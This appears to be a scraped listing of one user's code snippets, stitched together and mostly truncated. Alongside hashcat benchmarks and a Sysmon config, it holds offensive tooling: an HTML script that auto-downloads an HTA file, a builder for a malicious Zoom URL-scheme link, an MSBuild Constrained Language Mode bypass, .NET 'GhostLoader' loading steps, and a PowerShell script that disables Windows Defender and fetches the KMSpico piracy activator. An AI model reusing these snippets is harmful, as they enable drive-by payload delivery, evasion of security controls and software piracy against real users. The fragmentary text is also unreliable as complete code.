C0axx

## 6x Nvidia RTX 2080 (08G-P4-2080-KR Blower cards)  Hashcat Benchmarks

### Benchmarks

#### Stock Clocks
```bash

hashcat (v5.1.0-634-gbfdeb6ea) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.

C0axx

6x Nvidia RTX 2080 (08G-P4-2080-KR Blower cards) Hashcat Benchmarks

Benchmarks

Stock Clocks

hashcat (v5.1.0-634-gbfdeb6ea) starting in benchmark mode...

C0axx

<a href="#" id="download">legit</al>
<script>
var element = document.getElementById("download");
element.href = "legit.hta";
element.click();
</script>

C0axx

// Usage to build a custom url
// sabri@localhost Desktop % node converter.js "cmd=sic&type=none&uss=355fed60.8b5mS4m5-EvxX4mpOGePJnqP7eHtppIFCmhYCQWWa8Da49yd91RbLyWP6RwF31vD&cnonce=3YHffyG67M1KfWNLg-JiWofUJJRpcAmCck9W3n0-MKA-&app=chrome&from=meeting&previewUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&downloadUrl=%5C%5C%3F%5CC%3A%5CWindows%5Cexplorer.exe&fileName=Click%20for%20me%20%40pwnsdx&fileSize=240&fileId=&thumbnailUrl=https%3A%2F%2Fwww.getdigital.eu%2Fweb%2Fgetdigital%2Fgfx%2Fproducts%2F__generated__resized%2F380x380%2FAufkleber_Trollface.jpg"
// Your URL is zoommtg://zoom.us/zoom?mcf=0&browser=chrome&confid=Y21kPXNpYyZ0eXBlPW5vbmUmdXNzPTM1NWZlZDYwLjhiNW1TNG01LUV2eFg0bXBPR2VQSm5xUDdlSHRwcElGQ21oWUNRV1dhOERhNDl5ZDkxUmJMeVdQNlJ3RjMxdkQmY25vbmNlPTNZSGZmeUc2N00xS2ZXTkxnLUppV29mVUpKUnBjQW1DY2s5VzNuMC1NS0EtJmFwcD1jaHJvbWUmZnJvbT1tZWV0aW5nJnByZXZpZXdVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZG93bmxvYWRVcmw9JTVDJTVDJTNGJTVDQyUzQSU1Q1dpbmRvd3MlNUNleHBsb3Jlci5leGUmZmlsZU5hbWU9Q2xpY2slMjBmb3Il

C0axx

#!/usr/bin/env python3
import requests, sys
from bs4 import BeautifulSoup as bs

domain = sys.argv[1]
subdomains = []

params = {
    'CSRF102664102' : 'geek100526529',
    'CSRF105639185' : 'espionage103090877',

C0axx

// Example below is with mitm6 (https://github.com/fox-it/mitm6/)

// Note: Adding the '--add-binary' option here is specific to mitm6, not required in all cases.

# pip install pyinstaller
# pyinstaller --clean -F --add-binary="/usr/lib/x86_64-linux-gnu/libpython2.7.so.1.0:." ./mitm6.py

// The step above will create a single binary in the ./dist/ directory called mitm6

// Install staticx and dependencies

C0axx

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Bypass">
   <CLMBypass/>
  </Target>
   <UsingTask
    TaskName="CLMBypass"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
     <Task>
      <Reference Include="System.Management.Automation" />		

C0axx

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe

C0axx

$KMSUrl = "https://codeload.github.com/charygao/KMSpico_v10.2.0/zip/master"
$KMSDst = "C:\windows\temp\KMSpico.zip"
$KMSUnzip = "C:\windows\temp\KMSPico"
$KMSExe = "C:\Windows\Temp\KMSPico\KMSpico_v10.2.0-master\KMSpico Portable\AutoPico.exe"

if ((Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Windows 10" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2016" -or (Get-CimInstance -ClassName Win32_OperatingSystem).name -match "Server 2019") {

    Write-Host -ForegroundColor Green "[+] Temporarily disabling Windows Defender Real time Scanning"
    Set-MpPreference -ExclusionPath C:\windows\temp
    set-MpPreference -DisableRealtimeMonitoring $true

C0axx

<Sysmon schemaversion="4.50">
  <HashAlgorithms>*</HashAlgorithms>
  <!-- This now also determines the file names of the files preserved (String) -->
  <CheckRevocation />
  <DnsLookup>False</DnsLookup>
  <!-- Disables lookup behavior, default is True (Boolean) -->
  <ArchiveDirectory>Sysmon</ArchiveDirectory>
  <!-- Sets the name of the directory in the C:\ root where preserved files will be saved (String)-->
  <CaptureClipboard />
  <!--This enables capturing the Clipboard changes-->